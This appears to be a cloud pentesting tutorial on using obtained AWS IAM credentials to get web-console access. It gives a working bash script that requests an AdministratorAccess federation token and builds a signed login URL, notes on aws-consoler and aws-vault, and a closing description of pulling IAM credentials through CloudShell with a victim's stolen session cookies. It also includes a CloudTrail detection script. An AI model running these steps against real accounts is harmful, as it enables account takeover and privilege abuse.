If you have managed to obtain some IAM credentials, you may be interested in accessing the web console using the following tools.
Note that the user/role must have the sts:GetFederationToken permission.
Standard script
The following script uses the default profile and a default AWS location (not gov and not cn) to give you a signed URL that you can use to log in to the web console:
```bash
# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
status=$?  # Capture the exit status before any other command overwrites it

if [ $status -ne 0 ]; then
    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
    exit $status
fi

# Parse the output
session_id=$(echo "$output" | jq -r '.Credentials.AccessKeyId')
session_key=$(echo "$output" | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo "$output" | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
    --get \
    --data-urlencode "Action=getSigninToken" \
    --data-urlencode "SessionDuration=43200" \
    --data-urlencode "Session=$json_creds")
signin_token=$(echo -n "$resp" | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)

# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
```
```bash
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] # This will generate a link to login into the console
```
Make sure the IAM user has the sts:GetFederationToken permission, or provide a role to assume.
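On the detection side, the flow above leaves a recognizable pair in CloudTrail: an `sts:GetFederationToken` call followed by a console sign-in from the resulting federated user. The following is an added example, not part of the original page; the sample records are constructed, and the field names are assumed to follow the CloudTrail record format.

```python
from datetime import datetime

ADMIN_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"
FMT = "%Y-%m-%dT%H:%M:%SZ"

# Constructed CloudTrail records (placeholder account ID, user names, IPs and times).
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "sts.amazonaws.com",
     "eventName": "GetFederationToken", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "IAMUser", "accountId": "111122223333",
                      "arn": "arn:aws:iam::111122223333:user/ci-deploy"},
     "requestParameters": {"name": "consoler", "policyArns": [{"arn": ADMIN_ARN}]}},
    {"eventTime": "2024-05-01T10:00:40Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "198.51.100.7",
     "userIdentity": {"type": "FederatedUser", "accountId": "111122223333",
                      "arn": "arn:aws:sts::111122223333:federated-user/consoler"}},
    {"eventTime": "2024-05-01T11:00:00Z", "eventSource": "signin.amazonaws.com",
     "eventName": "ConsoleLogin", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"type": "IAMUser", "accountId": "111122223333",
                      "arn": "arn:aws:iam::111122223333:user/alice"}},
]

def find_federated_console_logins(events, window_seconds=43200):
    """Pair each GetFederationToken call with later console sign-ins by the
    federated user it created (same account, same name, within the window)."""
    issued, findings = [], []
    for ev in sorted(events, key=lambda e: e["eventTime"]):
        ident = ev.get("userIdentity", {})
        when = datetime.strptime(ev["eventTime"], FMT)
        if ev["eventSource"] == "sts.amazonaws.com" and ev["eventName"] == "GetFederationToken":
            params = ev.get("requestParameters") or {}
            arns = [p.get("arn") for p in params.get("policyArns") or []]
            fed = f"arn:aws:sts::{ident.get('accountId')}:federated-user/{params.get('name')}"
            issued.append({"when": when, "caller": ident.get("arn"), "fed_arn": fed,
                           "admin_policy": ADMIN_ARN in arns})
        elif (ev["eventSource"] == "signin.amazonaws.com"
              and ev["eventName"] in ("GetSigninToken", "ConsoleLogin")
              and ident.get("type") == "FederatedUser"):
            for tok in issued:
                age = (when - tok["when"]).total_seconds()
                if tok["fed_arn"] == ident.get("arn") and 0 <= age <= window_seconds:
                    findings.append({"caller": tok["caller"], "federated_user": tok["fed_arn"],
                                     "signin_event": ev["eventName"],
                                     "seconds_after_token": int(age),
                                     "admin_policy": tok["admin_policy"],
                                     "source_ip": ev.get("sourceIPAddress")})
    return findings

if __name__ == "__main__":
    for finding in find_federated_console_logins(SAMPLE_EVENTS):
        print(finding)
```

The default window matches the `SessionDuration=43200` used in the script; a finding where the caller is a service or CI identity, or where `admin_policy` is true, is the one to triage first.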
aws-vault
aws-vault is a tool to securely store and access AWS credentials in a development environment.
```bash
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
```
You can also use aws-vault to obtain a browser console session.
From Console to IAM Creds
Originally discovered in this post: if you manage to compromise some access to a web console (maybe you stole cookies and could not access the .aws folder), you can obtain some IAM token credentials for that user through CloudShell.
CloudShell exposes IAM credentials via an undocumented endpoint on port 1338. After loading the victim's session cookies into your browser, you can navigate to CloudShell and issue the following commands to get IAM credentials.